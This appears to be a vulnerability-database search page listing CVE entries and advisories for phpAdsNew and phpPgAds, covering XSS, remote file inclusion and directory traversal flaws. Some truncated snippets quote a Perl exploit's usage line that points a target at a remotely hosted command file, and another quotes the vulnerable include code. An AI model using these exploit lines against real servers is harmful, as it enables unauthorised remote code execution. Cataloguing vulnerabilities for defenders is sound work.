108 matches found
CVE-2007-0363
CVE-2007-0363 is an XSS vulnerability described in the primary CVE entry. Affected products are Openads for PostgreSQL (aka phpPgAds) before 2.0.10 and Openads (aka phpAdsNew) before 2.0.10. The issue occurs in admin-search.php and allows remote attackers to inject arbitrary web script or HTML vi...
CVE-2006-6415
PHP remote file inclusion vulnerability in admin/lib-maintenance.inc.php in phpAdsNew 2.0.4-pr2 allows remote attackers to execute arbitrary PHP code via a URL in the phpAdspath parameter, a different component than CVE-2006-3984. NOTE: this issue is disputed by CVE, since phpAdspath is used as a...
CVE-2006-6415
CVE-2006-6415 describes a remote file inclusion risk in phpAdsNew 2.0.4-pr2, involving admin/lib-maintenance.inc.php and the phpAds_path parameter. Exploitation would allow remote PHP code execution via a URL. The issue is noted as disputed by CVE, since phpAds_path is used as a constant. Connect...
PT-2006-7024 · Phpadsnew · Phpadsnew
Name of the Vulnerable Software and Affected Versions: phpAdsNew version 2.0.4-pr2 Description: A remote file inclusion issue exists, allowing remote attackers to execute arbitrary PHP code via a URL in the phpAds path parameter. This issue is disputed, as phpAds path is used as a constant...
phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit
No description provided by source. !/usr/bin/perl phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit Download Script http://www.drunkenblog.com/drunkenblog-archives/i/phpAdsNew-2.0.4-pr2.zip Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl target cmd shell...
phpadsnew-rfi.txt
!/usr/bin/perl phpAdsNew-2.0.4-pr2 Remote File Inclusion Exploit Download Script http://www.drunkenblog.com/drunkenblog-archives/i/phpAdsNew-2.0.4-pr2.zip Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl perl cra http://site.com/ http://site.com/cmd.txt c...
PHPAdsNew远程执行任意代码漏洞
phpAdsNew是用PHP开发的WEB站点Banner管理程序。 phpAdsNew存在一个安全漏洞,允许远程攻击者以Web Server进程所拥有的权限在系统上执行任意代码。 该程序使用了一个变量$phpAdspath,远程用户可以指定该变量的值,但是phpAdsNew未对用户输入进行适当的检查。通过精心构造URL请求,远程攻击者可以使受影响的phpAdsNew执行位于第三方主机上的任意PHP程序。 phpAdsNew phpAdsNew 2.0beta 6 临时解决方法: Niels Leenheer ( [email protected] ) 提供了如下的修补方法:...
phpAdsNew-2.0.8-2.txt
====================================================================================== phpAdsNew = Remote File Include ====================================================================================== Scripts: phpAdsNew Download: http://sourceforge.net/projects/phpAdsNew Version : 2.0.8...
phpAdsNew-2.0.8 <= (adlayer.php) Remote File Include
====================================================================================== phpAdsNew = Remote File Include ====================================================================================== Scripts: phpAdsNew Download: http://sourceforge.net/projects/phpAdsNew Version : 2.0.8...
CVE-2006-5515
Cross-site scripting XSS vulnerability in lib-history.inc.php in phpAdsNew and phpPgAds before 2.0.8-pr1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to injected data that is stored by a delivery script and displayed by the admin interface...
CVE-2006-5515
Cross-site scripting XSS vulnerability in lib-history.inc.php in phpAdsNew and phpPgAds before 2.0.8-pr1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to injected data that is stored by a delivery script and displayed by the admin interface...
CVE-2006-5515
CVE-2006-5515 is a stored XSS vulnerability in the lib-history.inc.php component of phpAdsNew and phpPgAds up to version 2.0.8-pr1 . The issue allows remote attackers to inject arbitrary web script via vectors related to data stored by a delivery script and displayed in the admin interface. Affec...
CVE-2006-5437
Directory traversal vulnerability in upgrade.php in phpAdsNew 2.0.8 allows remote attackers to read arbitrary files via a .. dot dot in the phpAdsconfiglanguage parameter. NOTE: this issue could not be reproduced by a third party...
CVE-2006-5437
Directory traversal vulnerability in upgrade.php in phpAdsNew 2.0.8 allows remote attackers to read arbitrary files via a .. dot dot in the phpAdsconfiglanguage parameter. NOTE: this issue could not be reproduced by a third party...
CVE-2006-5437
Affected software: phpAdsNew 2.0.8. Issue: directory traversal in upgrade.php due to unsanitized input in phpAds_config[language] parameter, enabling remote attackers to read arbitrary files by supplying a .. payload. Root cause: insufficient input validation in upgrade.php. Impact: potential exp...
PT-2006-6156 · Phpadsnew · Phpadsnew
Name of the Vulnerable Software and Affected Versions: phpAdsNew version 2.0.8 Description: A directory traversal issue exists, allowing remote attackers to read arbitrary files. This is achieved by using a .. dot dot in the phpAds configlanguage parameter in the "upgrade.php" file...
phpAdsNew-2.0.8.txt
Autors: - Michał wacky Błaszczak - Nobody http://iHACK.pl File: modules/phpads/admin/upgrade.php Code: // Load language strings if fileexists"../language/".$phpAdsconfig'language'."/default.lang.php" include"../language/".$phpAdsconfig'language'."/default.lang.php"; else $phpAdsconfig'language' =...
phpAdsNew include bug!
Autors: - Micha wacky Baszczak - Nobody http://iHACK.pl File: modules/phpads/admin/upgrade.php Code: // Load language strings if fileexists"../language/".$phpAdsconfig'language'."/default.lang.ph p" include"../language/".$phpAdsconfig'language'."/default.lang.php"; else $phpAdsconfig'language' =...
phpauction21.txt
+-------------------------------------------------------------------- + + PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: PHPAuction 2.1 maybe higher with phpAdsNew, + phpAdsNew 2.0.5 maybe...
CVE-2006-3984
PHP remote file inclusion vulnerability in phpAdsNew/view.inc.php in Albasoftware Phpauction 2.1 and possibly later versions, with phpAdsNew 2.0.5, allows remote attackers to execute arbitrary PHP code via a URL in the phpAdspath parameter...